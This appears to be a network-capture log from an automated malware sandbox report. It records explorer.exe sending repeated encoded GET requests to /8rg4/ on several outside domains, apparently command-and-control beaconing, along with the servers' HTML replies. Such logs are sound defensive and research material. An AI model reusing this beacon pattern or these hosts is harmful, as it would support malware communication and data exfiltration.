Jan 13, 2021 20:50:13.585222960 CET	5831	IN	HTTP/1.1 302 Found Content-Type: text/html; charset=utf-8 Date: Wed, 13 Jan 2021 19:50:13 GMT Location: https://www.afternic.com/forsale/futbolclubbarcelona.soccer?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_campaign=TDFS_DASLNC&traffic_type=TDFS_DASLNC&traffic_id=daslnc&GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH Server: nginx/1.16.1 Content-Length: 303 Connection: Close Data Raw: 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 66 74 65 72 6e 69 63 2e 63 6f 6d 2f 66 6f 72 73 61 6c 65 2f 66 75 74 62 6f 6c 63 6c 75 62 62 61 72 63 65 6c 6f 6e 61 2e 73 6f 63 63 65 72 3f 75 74 6d 5f 73 6f 75 72 63 65 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 75 74 6d 5f 6d 65 64 69 75 6d 3d 44 41 53 4c 4e 43 26 61 6d 70 3b 75 74 6d 5f 63 61 6d 70 61 69 67 6e 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 74 72 61 66 66 69 63 5f 74 79 70 65 3d 54 44 46 53 5f 44 41 53 4c 4e 43 26 61 6d 70 3b 74 72 61 66 66 69 63 5f 69 64 3d 64 61 73 6c 6e 63 26 61 6d 70 3b 47 58 49 54 43 3d 4f 43 55 70 61 38 71 71 6e 35 63 46 66 37 51 58 71 79 41 4c 4d 55 68 57 71 35 39 4a 62 6d 78 75 65 4d 55 75 6b 2b 34 2b 64 4c 49 47 37 54 43 59 36 78 62 77 50 4c 4f 50 72 61 37 48 61 51 73 51 74 70 66 57 26 61 6d 70 3b 4a 74 37 3d 58 50 79 34 6e 46 6a 48 22 3e 46 6f 75 6e 64 3c 2f 61 3e 2e 0a 0a Data Ascii: <a href="https://www.afternic.com/forsale/futbolclubbarcelona.soccer?utm_source=TDFS_DASLNC&utm_medium=DASLNC&utm_campaign=TDFS_DASLNC&traffic_type=TDFS_DASLNC&traffic_id=daslnc&GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH">Found</a>.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
13	192.168.2.3	49762	135.181.31.212	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:50:18.658442020 CET	6326	OUT	GET /8rg4/?Jt7=XPy4nFjH&GXITC=uS+zrowBZiDCiIR1winmtMz5/k2UN8IqbLiSHE1AQhYcL5km83JNyqC1Y7J6LH3RCUfl HTTP/1.1 Host: www.ondesign03.net Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:50:18.722733021 CET	6327	IN	HTTP/1.1 404 Not Found Server: nginx Date: Wed, 13 Jan 2021 19:50:18 GMT Content-Type: text/html Content-Length: 1417 Connection: close Vary: Accept-Encoding Last-Modified: Wed, 05 Aug 2020 09:00:18 GMT ETag: "589-5ac1d99d73c92" Accept-Ranges: bytes Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 26 6d 64 61 73 68 3b 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 53 6f 72 72 79 2c 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 22 2f 3e 0a 20 20 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 20 63 6f 6c 6f 72 3a 23 37 37 37 37 37 37 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 61 72 69 61 6c 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 30 70 78 3b 20 63 6f 6c 6f 72 3a 23 39 39 41 37 41 46 3b 20 6d 61 72 67 69 6e 3a 20 37 30 70 78 20 30 20 30 20 30 3b 7d 0a 20 20 20 20 20 20 20 20 68 32 20 7b 63 6f 6c 6f 72 3a 20 23 44 45 36 43 35 44 3b 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 61 72 69 61 6c 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 2d 31 70 78 3b 20 6d 61 72 67 69 6e 3a 20 2d 33 70 78 20 30 20 33 39 70 78 3b 7d 0a 20 20 20 20 20 20 20 20 70 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 20 6d 61 72 67 69 6e 2d 74 6f 70 3a 20 33 30 70 78 20 7d 0a 20 20 20 20 20 20 20 20 64 69 76 20 7b 77 69 64 74 68 3a 33 32 30 70 78 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 61 75 74 6f 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 61 75 74 6f 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 6c 69 6e 6b 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 76 69 73 69 74 65 64 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 61 63 74 69 76 65 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 20 20 20 20 61 3a 68 6f 76 65 72 20 7b 63 6f 6c 6f 72 3a 20 23 33 34 35 33 36 41 3b 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 0a 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 70 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 6f 6e 64 65 73 69 67 6e 30 33 2e 6e 65 74 2f 22 3e 6f 6e 64 65 73 69 67 6e 30 33 2e 6e 65 74 3c 2f 61 3e 3c 2f 70 3e 0a Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head> <title>404 — Not Found</title> <meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/> <meta name="description" content="Sorry, page not found"/> <style type="text/css"> body {font-size:14px; color:#777777; font-family:arial; text-align:center;} h1 {font-size:180px; color:#99A7AF; margin: 70px 0 0 0;} h2 {color: #DE6C5D; font-family: arial; font-size: 20px; font-weight: bold; letter-spacing: -1px; margin: -3px 0 39px;} p {width:320px; text-align:center; margin-left:auto;margin-right:auto; margin-top: 30px } div {width:320px; text-align:center; margin-left:auto;margin-right:auto;} a:link {color: #34536A;} a:visited {color: #34536A;} a:active {color: #34536A;} a:hover {color: #34536A;} </style></head><body> <p><a href="http://ondesign03.net/">ondesign03.net</a></p>
Jan 13, 2021 20:50:18.722768068 CET	6328	IN	Data Raw: 20 20 20 20 3c 68 31 3e 34 30 34 3c 2f 68 31 3e 0a 20 20 20 20 3c 68 32 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0a 20 20 20 20 3c 64 69 76 3e 0a 20 20 20 20 20 20 20 20 49 74 20 73 65 65 6d 73 20 74 68 61 74 20 74 68 65 20 70 Data Ascii: <h1>404</h1> <h2>Page Not Found</h2> <div> It seems that the page you were trying to reach does not exist anymore, or maybe it has just moved. You can start again from the <a href="http://ondesign03.net/">home</a> o

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
14	192.168.2.3	49763	34.102.136.180	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:50:26.900141954 CET	6328	OUT	GET /8rg4/?GXITC=UZP/0BHyEu1M6xcQwfN1oLvS1pOV65j2qrbsgROtnkuQKUAN6nqHjVn7Ph/tqme/ujGF&Jt7=XPy4nFjH HTTP/1.1 Host: www.crafteest.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:50:27.039673090 CET	6329	IN	HTTP/1.1 403 Forbidden Server: openresty Date: Wed, 13 Jan 2021 19:50:26 GMT Content-Type: text/html Content-Length: 275 ETag: "5ffc8399-113" Via: 1.1 google Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
15	192.168.2.3	49764	104.233.238.207	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:50:32.249113083 CET	6329	OUT	GET /8rg4/?Jt7=XPy4nFjH&GXITC=g6ZLIXg/UwPI2zN++0KgA5ROz8OC0OKcGUmwlWBSMhZo355JVkF8Ii0xedOvXN1SU6xI HTTP/1.1 Host: www.4037a.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:50:32.450179100 CET	6331	IN	HTTP/1.1 404 Not Found Content-Type: text/html Server: Microsoft-IIS/7.5 Date: Wed, 13 Jan 2021 19:26:03 GMT Connection: close Content-Length: 2885 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 6d 75 6c 61 74 65 49 45 37 22 20 2f 3e 20 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 67 62 32 33 31 32 22 20 2f 3e 0d 0a 3c 74 69 74 6c 65 3e b0 a5 d1 bd a1 ad c4 fa b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da 2d b9 dc bc d2 c6 c5 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 0d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 ce a2 c8 ed d1 c5 ba da 22 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 44 41 44 39 44 37 7d 0d 0a 69 6d 67 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 0d 0a 61 20 2a 7b 63 75 72 73 6f 72 3a 70 6f 69 6e 74 65 72 7d 0d 0a 75 6c 2c 6c 69 7b 6c 69 73 74 2d 73 74 79 6c 65 3a 6e 6f 6e 65 7d 0d 0a 74 61 62 6c 65 7b 74 61 62 6c 65 2d 6c 61 79 6f 75 74 3a 66 69 78 65 64 3b 7d 0d 0a 74 61 62 6c 65 20 74 72 20 74 64 7b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 20 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 0d 0a 0d 0a 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 6f 75 74 6c 69 6e 65 3a 6e 6f 6e 65 7d 0d 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 75 6e 64 65 72 6c 69 6e 65 7d 0d 0a 2e 63 66 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 20 22 2e 22 3b 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 68 65 69 67 68 74 3a 20 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 30 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 76 69 73 69 62 69 6c 69 74 79 3a 20 68 69 64 64 65 6e 3b 7d 0d 0a 2e 63 66 7b 7a 6f 6f 6d 3a 20 31 3b 63 6c 65 61 72 3a 62 6f 74 68 7d 0d 0a 0d 0a 2e 62 67 7b 77 69 64 74 68 3a 31 30 30 25 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 22 34 30 34 2f 30 31 2e 6a 70 67 22 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 20 74 6f 70 20 23 44 41 44 39 44 37 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 74 6f 70 3a 30 3b 6c 65 66 74 3a 30 3b 68 65 69 67 68 74 3a 36 30 30 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 0d 0a 2e 63 6f 6e 74 7b 6d 61 72 67 69 6e 3a 30 20 61 75 74 6f 3b 77 69 64 74 68 3a 35 30 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 30 70 78 3b 7d 0d 0a 2e 63 31 7b 68 65 69 67 68 74 3a 33 36 30 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0d 0a 2e 63 31 20 2e 69 6d 67 31 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 38 30 70 78 7d 0d 0a 2e 63 31 20 2e 69 6d 67 32 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 36 35 70 78 7d 0d 0a 2e 63 6f 6e 74 20 68 32 7b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 38 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><meta http-equiv="X-UA-Compatible" content="IE=EmulateIE7" /> <meta http-equiv="Content-Type" content="text/html; charset=gb2312" /><title>-</title><link rel="stylesheet" type="text/css" /><style>{margin:0;padding:0}body{font-family:"";background:#DAD9D7}img{border:none}a {cursor:pointer}ul,li{list-style:none}table{table-layout:fixed;}table tr td{word-break:break-all; word-wrap:break-word;}a{text-decoration:none;outline:none}a:hover{text-decoration:underline}.cf:after{content: ".";display: block;height: 0;font-size: 0;clear:both;visibility: hidden;}.cf{zoom: 1;clear:both}.bg{width:100%;background:url("404/01.jpg") no-repeat center top #DAD9D7;position:absolute;top:0;left:0;height:600px;overflow:hidden}.cont{margin:0 auto;width:500px;line-height:20px;}.c1{height:360px;text-align:center}.c1 .img1{margin-top:180px}.c1 .img2{margin-top:165px}.cont h2{text-align:center;color:#555;font-size:18px;font-weight:nor
Jan 13, 2021 20:50:32.450212002 CET	6332	IN	Data Raw: 6d 61 6c 3b 68 65 69 67 68 74 3a 33 35 70 78 7d 0d 0a 2e 63 32 7b 68 65 69 67 68 74 3a 33 35 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 0d 0a 2e 63 32 20 61 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 6d Data Ascii: mal;height:35px}.c2{height:35px;text-align:center}.c2 a{display:inline-block;margin:0 4px;font-size:14px;height:23px;color:#626262;padding-top:1px;text-decoration:none;text-align:left}.c2 a:hover{color:#626262;text-decoration:none;}.c2
Jan 13, 2021 20:50:32.651068926 CET	6333	IN	Data Raw: 20 2f 3e 3c 2f 64 69 76 3e 0d 0a 09 09 3c 68 32 3e b0 a5 d1 bd a1 ad c4 fa b7 c3 ce ca b5 c4 d2 b3 c3 e6 b2 bb b4 e6 d4 da 3c 2f 68 32 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 32 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f Data Ascii: /></div><h2></h2><div class="c2"><a href="http://www.666604.com" class="home"></a><a href="http://www.666604.com" class="sr"></a></div><div class="c3"><a href="http://www.666604.

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
16	192.168.2.3	49765	195.78.66.137	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:50:37.732845068 CET	6333	OUT	GET /8rg4/?GXITC=L7V441KiAATu6fuoHN/41IvtgRJfdM/cnIWc7uffZYQ2+9SD1ao7C7BypTYCICY8/lDr&Jt7=XPy4nFjH HTTP/1.1 Host: www.puzelhome.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:50:38.267407894 CET	6334	IN	HTTP/1.1 404 Not Found Connection: close Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-transform, no-cache, no-store, must-revalidate Content-Type: text/html; charset=UTF-8 Link: <http://www.puzzelhome.com/index.php/wp-json/>; rel="https://api.w.org/" X-LiteSpeed-Cache: hit Content-Length: 49522 Date: Wed, 13 Jan 2021 19:50:37 GMT Server: LiteSpeed Vary: User-Agent
Jan 13, 2021 20:50:38.267442942 CET	6335	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 70 6c 2d 50 4c 22 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a Data Ascii: <!doctype html><html lang="pl-PL"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="profile" href="http://gmpg.org/xfn/11"> <meta http-equi
Jan 13, 2021 20:50:38.267462015 CET	6336	IN	Data Raw: 69 6f 6e 28 65 2c 61 2c 74 29 7b 76 61 72 20 72 2c 6e 2c 6f 2c 69 2c 70 3d 61 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 73 3d 70 2e 67 65 74 43 6f 6e 74 65 78 74 26 26 70 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 Data Ascii: ion(e,a,t){var r,n,o,i,p=a.createElement("canvas"),s=p.getContext&&p.getContext("2d");function c(e,t){var a=String.fromCharCode;s.clearRect(0,0,p.width,p.height),s.fillText(a.apply(this,e),0,0);var r=p.toDataURL();return s.clearRect(0,0,p.widt
Jan 13, 2021 20:50:38.267479897 CET	6338	IN	Data Raw: 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 74 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 74 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 2c 74 2e 73 75 70 70 6f 72 74 73 2e 65 76 Data Ascii: upports.flag,t.DOMReady=!1,t.readyCallback=function(){t.DOMReady=!0},t.supports.everything\|\|(n=function(){t.readyCallback()},a.addEventListener?(a.addEventListener("DOMContentLoaded",n,!1),e.addEventListener("load",n,!1)):(e.attachEvent("onloa
Jan 13, 2021 20:50:38.267498970 CET	6339	IN	Data Raw: 63 2d 62 6c 6f 63 6b 2d 73 74 79 6c 65 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 7a 7a 65 6c 68 6f 6d 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 77 6f 6f 63 6f 6d 6d 65 72 63 65 Data Ascii: c-block-style-css' href='http://www.puzzelhome.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/build/style.css?ver=2.7.3' type='text/css' media='all' /><link rel='stylesheet' id='jquery-selectBox-css' href='http://www.puzzelh
Jan 13, 2021 20:50:38.267522097 CET	6341	IN	Data Raw: 33 39 35 39 39 45 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 33 39 35 39 39 45 3b 7d 2e 79 69 74 68 2d 77 63 77 6c 2d 73 68 61 72 65 20 61 2e 65 6d 61 69 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 46 42 42 31 30 32 3b 20 62 Data Ascii: 39599E; background-color: #39599E;}.yith-wcwl-share a.email{background: #FBB102; background-color: #FBB102;}.yith-wcwl-share a.email:hover{background: #39599E; background-color: #39599E;}.yith-wcwl-share a.whatsapp{background: #00A901; backgro
Jan 13, 2021 20:50:38.267543077 CET	6342	IN	Data Raw: 27 77 6f 6f 63 6f 6d 6d 65 72 63 65 2d 69 6e 6c 69 6e 65 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 2e 77 6f 6f 63 6f 6d 6d 65 72 63 65 20 66 6f 72 6d 20 2e 66 6f 72 6d 2d 72 6f 77 20 2e 72 65 71 75 Data Ascii: 'woocommerce-inline-inline-css' type='text/css'>.woocommerce form .form-row .required { visibility: visible; }</style><link rel='stylesheet' id='woocommerce_prettyPhoto_css-css' href='//www.puzzelhome.com/wp-content/plugins/woocommerce/ass
Jan 13, 2021 20:50:38.267559052 CET	6343	IN	Data Raw: 31 70 78 2c 20 31 70 78 2c 20 31 70 78 2c 20 31 70 78 29 3b 20 68 65 69 67 68 74 3a 20 31 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 20 6f 76 65 72 66 6c 6f 77 3a 20 68 69 64 64 65 6e 3b 20 77 69 64 74 68 3a 20 31 70 78 Data Ascii: 1px, 1px, 1px, 1px); height: 1px; position: absolute; overflow: hidden; width: 1px; }</style><link rel='stylesheet' id='shop-elite-google-fonts-css' href='https://fonts.googleapis.com/css?family=Roboto%20Condensed:300,400,700\|Open%20Sans:30
Jan 13, 2021 20:50:38.267576933 CET	6345	IN	Data Raw: 2f 6a 65 74 70 61 63 6b 2e 63 73 73 3f 76 65 72 3d 38 2e 38 2e 32 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 Data Ascii: /jetpack.css?ver=8.8.2' type='text/css' media='all' /><script type='text/javascript' src='http://www.puzzelhome.com/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp' id='jquery-core-js'></script><script type='text/javascript' src='http://www.pu
Jan 13, 2021 20:50:38.294904947 CET	6346	IN	Data Raw: 32 78 31 39 32 22 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 70 70 6c 65 2d 74 6f 75 63 68 2d 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 70 75 7a 7a 65 6c 68 6f 6d 65 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f Data Ascii: 2x192" /><link rel="apple-touch-icon" href="http://www.puzzelhome.com/wp-content/uploads/2020/08/cropped-ikona-1-180x180.jpg" /><meta name="msapplication-TileImage" content="http://www.puzzelhome.com/wp-content/uploads/2020/08/cropped-ikona-

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.3	49731	37.48.65.150	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:48:30.123297930 CET	1014	OUT	GET /8rg4/?Jt7=XPy4nFjH&GXITC=osi+A10z8UfF+hLPMjJYmpHKyhIlbIEVA9B0c1cfBZO+nRhGg7O1B3xz82EPTgtpN2NV HTTP/1.1 Host: www.tomatrader.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Jan 13, 2021 20:48:30.411103010 CET	1017	IN	HTTP/1.1 302 Found cache-control: max-age=0, private, must-revalidate connection: close content-length: 11 date: Wed, 13 Jan 2021 19:48:29 GMT location: http://survey-smiles.com server: nginx set-cookie: sid=4f9b09d2-55d8-11eb-a7b2-55f977ddc834; path=/; domain=.tomatrader.com; expires=Mon, 31 Jan 2089 23:02:37 GMT; max-age=2147483647; HttpOnly Data Raw: 52 65 64 69 72 65 63 74 69 6e 67 Data Ascii: Redirecting

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.3	49740	54.208.77.124	80	C:\Windows\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Jan 13, 2021 20:48:45.960675955 CET	5420	OUT	GET /8rg4/?GXITC=OCUpa8qqn5cFf7QXqyALMUhWq59JbmxueMUuk+4+dLIG7TCY6xbwPLOPra7HaQsQtpfW&Jt7=XPy4nFjH HTTP/1.1 Host: www.futbolclubbarcelona.soccer Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
